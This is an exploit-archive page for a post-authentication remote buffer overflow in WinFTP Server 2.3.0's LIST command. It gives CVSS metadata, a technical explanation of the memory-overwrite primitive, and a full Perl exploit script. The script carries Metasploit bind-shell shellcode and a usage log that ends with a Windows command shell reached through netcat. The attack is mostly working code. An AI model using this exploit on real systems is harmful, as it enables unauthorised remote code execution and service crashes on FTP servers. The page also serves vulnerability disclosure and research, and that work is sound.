WinFTP 2.3.0 (LIST) Remote Buffer Overflow Exploit (post-auth)

2009.01.31
Credit: halcyon
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/perl # # WinFTP 2.3.0 post-auth remote exploit. (www.wftpserver.com) # ################################################################################ # # # root@halcyon:~/Exploits/WinFTP# perl winftp-remote.pl # # # # Usage: winftp-remote.pl <host> <username> <password> <target> # # # # Target: 1 -> Win2k # # Target: 2 -> WinXP sp2/3 (DoS only) # # # # root@halcyon:~/Exploits/WinFTP# perl winftp-remote.pl 10.0.0.5 user1 pass1 1 # # # # [=] Connected. # # [=] Sending user user1 # # [=] Sending pass pass1 # # [=] Sending payload... # # [=] Done. You should have a command shell on port 7777. # # # # root@halcyon:~/Exploits/WinFTP# nc 10.0.0.5 7777 # # Microsoft Windows 2000 [Version 5.00.2195] # # (C) Copyright 1985-1999 Microsoft Corp. # # # # C:\Program Files\WinFTP Server> # # # ################################################################################ # # Quick description of the exploit: # # There is a post-auth bug in WFTPSRV.exe (2.3.0), in the handling of the LIST # command. This appears to be different from the previous vuln found in # the handling of the NLIST command. Providing the server with # "LIST *<long string here>" results in an arbitrary memory overwrite # vulnerability. Note that simply giving LIST a long string won't trigger # the vuln. At least in my testing, the asterisk was necessary to force # WFTPSRV.exe to process the long string, which clobbers various stored # addresses, providing an opportunity for an arbitrary DWORD overwrite. # So exploitation goes like this: # # format string vuln -> overflow -> arbitrary memory overwrite -> EIP control # # On Win2k, the error is: # "The instruction at 0x77fc9906 referenced memory at # 0x88776655. The memory could not be "written". # # Which is what we want to see in order to control an arbitrary DWORD. # At this point our registers look like: # # EAX 010922E0 # ECX 0275FC14 # EDX 88776655 # EBX 00000028 # ESP 0275F688 # EBP 0275F81C # ESI 00F90000 # EDI 00F90378 # EIP 77FC9906 ntdll.77FC9906 # # Instructions look like: # # 77FC98F4 8B48 08 MOV ECX,DWORD PTR DS:[EAX+8] # 77FC98F7 898D 38FFFFFF MOV DWORD PTR SS:[EBP-C8],ECX # 77FC98FD 8B50 0C MOV EDX,DWORD PTR DS:[EAX+C] # 77FC9900 8995 34FFFFFF MOV DWORD PTR SS:[EBP-CC],EDX # 77FC9906 890A MOV DWORD PTR DS:[EDX],ECX # 77FC9908 8951 04 MOV DWORD PTR DS:[ECX+4],EDX # # Under normal conditions EDX and ECX contain pointers located # in the data segment. However, after exploitation we control # EDX (where to write), and ECX (what to write). From here, # we load EDX with (almost) any old return address on our stack, # and ECX with a pointer to our shellcode. # # Note: This is *not* a predictable vuln. I noticed even changing # the filename of the binary causes the offsets to change. # Please experiment on your own. Let me know if you manage to # get it working under WinXP SP2. # joewalko@gmail.com use IO::Socket; if (@ARGV < 2) { print "\nUsage: $0 <host> <username> <password> <target>\n\n"; print "Target: 1 -> Win2k\n"; print "Target: 2 -> WinXP sp2/3 (DoS only)\n\n"; exit; }; $host = $ARGV[0]; $username = $ARGV[1]; $password = $ARGV[2]; $port = 21; $list = "\x4c\x49\x53\x54\x20\x2a"; $padding = "\x41" x 272; $sock = new IO::Socket::INET ( PeerAddr=> "$host", PeerPort=> "$port", Proto => 'tcp' ); die "Connection failed: $!\n\n" unless $sock; $user_string = "user $username\r\n"; $pass_string = "pass $password\r\n"; $port_string = "PORT 10,0,0,1,154,119\r\n"; # Source host doesn't matter. $address2k = "\x74\xf8\x74\x02". # <- This needs to contain any # readable address, or we # immediately cause an exception. "\x14\xfc\x75\x02". # <- This will become EIP. It points # to our shellcode. "\x74\xf8\x75\x02"; # <- This specifies what DWORD to overwrite. # YMMV here. I picked an arbitrary # return address on the stack located # near where ESP was during # the exception. On my system this # is: # # 0275F874 73D34154 RETURN to MFC42.73D34154 $nopsled = "\x90" x 2228; # Metasploit win32_bind, EXITFUNC=process LPORT=7777 $shellcode = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x10". "\x92\xe9\xd3\x83\xeb\xfc\xe2\xf4\xec\xf8\x02\x9e\xf8\x6b\x16\x2c". "\xef\xf2\x62\xbf\x34\xb6\x62\x96\x2c\x19\x95\xd6\x68\x93\x06\x58". "\x5f\x8a\x62\x8c\x30\x93\x02\x9a\x9b\xa6\x62\xd2\xfe\xa3\x29\x4a". "\xbc\x16\x29\xa7\x17\x53\x23\xde\x11\x50\x02\x27\x2b\xc6\xcd\xfb". "\x65\x77\x62\x8c\x34\x93\x02\xb5\x9b\x9e\xa2\x58\x4f\x8e\xe8\x38". "\x13\xbe\x62\x5a\x7c\xb6\xf5\xb2\xd3\xa3\x32\xb7\x9b\xd1\xd9\x58". "\x50\x9e\x62\xa3\x0c\x3f\x62\x93\x18\xcc\x81\x5d\x5e\x9c\x05\x83". "\xef\x44\x8f\x80\x76\xfa\xda\xe1\x78\xe5\x9a\xe1\x4f\xc6\x16\x03". "\x78\x59\x04\x2f\x2b\xc2\x16\x05\x4f\x1b\x0c\xb5\x91\x7f\xe1\xd1". "\x45\xf8\xeb\x2c\xc0\xfa\x30\xda\xe5\x3f\xbe\x2c\xc6\xc1\xba\x80". "\x43\xc1\xaa\x80\x53\xc1\x16\x03\x76\xfa\xf7\xb2\x76\xc1\x60\x32". "\x85\xfa\x4d\xc9\x60\x55\xbe\x2c\xc6\xf8\xf9\x82\x45\x6d\x39\xbb". "\xb4\x3f\xc7\x3a\x47\x6d\x3f\x80\x45\x6d\x39\xbb\xf5\xdb\x6f\x9a". "\x47\x6d\x3f\x83\x44\xc6\xbc\x2c\xc0\x01\x81\x34\x69\x54\x90\x84". "\xef\x44\xbc\x2c\xc0\xf4\x83\xb7\x76\xfa\x8a\xbe\x99\x77\x83\x83". "\x49\xbb\x25\x5a\xf7\xf8\xad\x5a\xf2\xa3\x29\x20\xba\x6c\xab\xfe". "\xee\xd0\xc5\x40\x9d\xe8\xd1\x78\xbb\x39\x81\xa1\xee\x21\xff\x2c". "\x65\xd6\x16\x05\x4b\xc5\xbb\x82\x41\xc3\x83\xd2\x41\xc3\xbc\x82". "\xef\x42\x81\x7e\xc9\x97\x27\x80\xef\x44\x83\x2c\xef\xa5\x16\x03". "\x9b\xc5\x15\x50\xd4\xf6\x16\x05\x42\x6d\x39\xbb\xe0\x18\xed\x8c". "\x43\x6d\x3f\x2c\xc0\x92\xe9\xd3\x0d\x0a"; if ($ARGV[3] == '1') { $payload = $list.$padding.$address2k.$nopsled.$shellcode; } elsif ($ARGV[3] == '2') { $payload = $list.$padding.$address2k.$nopsled.$shellcode; } else { $payload = $list.$padding.$address2k.$nopsled.$shellcode; } print "\n[=] Connected.\n"; sleep 1; print "[=] Sending $user_string"; $sock->send($user_string); sleep 1; print "[=] Sending $pass_string"; $sock->send($pass_string); sleep 1; $sock->send($port_string); sleep 1; print "[=] Sending payload...\n"; $sock->send($payload); sleep 1; if ($ARGV[3] == '1') { print "[=] Done. You should have a command shell on port 7777.\n\n"; } elsif ($ARGV[3] == '2') { print "[=] Done. WinFTP should be crashed on the remote host.\n\n"; } else { print "[=] Done.\n\n"; }

References:

http://xforce.iss.net/xforce/xfdb/48263
http://www.securityfocus.com/bid/33454
http://www.milw0rm.com/exploits/7875
http://www.frsirt.com/english/advisories/2009/0254


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top